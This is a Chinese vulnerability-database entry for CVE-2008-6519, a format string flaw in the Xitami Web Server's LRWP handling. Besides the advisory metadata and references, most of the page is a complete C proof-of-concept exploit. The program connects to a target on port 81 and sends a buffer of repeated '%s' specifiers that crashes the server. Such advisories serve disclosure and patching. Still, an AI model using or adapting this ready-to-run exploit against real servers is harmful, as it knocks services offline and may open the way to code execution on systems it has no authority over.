iMatix Xitami 格式字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114905 漏洞类型 格式化字符串
发布时间 2008-04-03 更新时间 2009-03-25
CVE编号 CVE-2008-6519 CNNVD-ID CNNVD-200903-398
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/5354
https://cxsecurity.com/issue/WLB-2009030222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-398
|漏洞详情
Xitami中是由iMatix公司发展成为一个自由,开放源码的Web和FTP服务器产品。XitamiWebServer2.2a版本至2.5c2版本及其他版本中中存在格式字符串漏洞。远程攻击者可以借助提交一个长期运行网络程序(LRWP)中的格式字符串清单,造成拒绝服务(后台程序崩溃)并可能执行任意代码。该清单能触发错误的代码,包括SMT内核中的sendfmt函数。
|漏洞EXP
/**
 *
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for learning me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 *
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("\nXitami Web Server 2.5c2\n" );
    printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
    printf("[+] tested on WinXP Pro SP2 & Vista\n");
    printf("[+] usage: %s <hostname>\n\n", argv[0]);
    return -1;
  }

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    return -1;
  }

  if ((he=gethostbyname(argv[1])) == NULL){  // get the host info
    perror("gethoscattbyname");
    return -1;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    return -1;
  }

  their_addr.sin_family = AF_INET;  // host byte order
  their_addr.sin_port = htons(PORT);  // short, network byte order
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

  if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
    printf("[-] Connect failed.\n");
    closesocket(sockfd);
    return -1;
  }

  printf("[+] Server is listening...\n");

  Sleep(1000);

  /*
    setup format string request:
              %s*100 + \xFF + somestring + \xFF     (program termination)
    or:
              %n + \xFF + somestring + \xFF         (program crash)
  */

  memset(formatstring,'\x41', sizeof(formatstring));
  for (int i = 0; i<200; i+=2){
    memcpy(formatstring+i, "%s", 2);
  }
  memcpy(formatstring+200, "\xFF", 1);
  memcpy(formatstring+249, "\xFF", 1);

  printf("[+] Sending format string request...");
  Sleep(2000);

  if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
    Sleep(2000);
    printf("failed! Exiting...\n");
    closesocket(sockfd);
    WSACleanup();
    return -1;
  }

  Sleep(2000);
  closesocket(sockfd);
  printf("done.\n");


  return 0;
}

// milw0rm.com [2008-04-03]
|参考资料

来源:XF
名称:xitami-lrwp-requestlogging-code-execution(41644)
链接:http://xforce.iss.net/xforce/xfdb/41644
来源:BID
名称:28603
链接:http://www.securityfocus.com/bid/28603
来源:MILW0RM
名称:5354
链接:http://www.milw0rm.com/exploits/5354
来源:MISC
链接:http://www.bratax.be/advisories/b013.html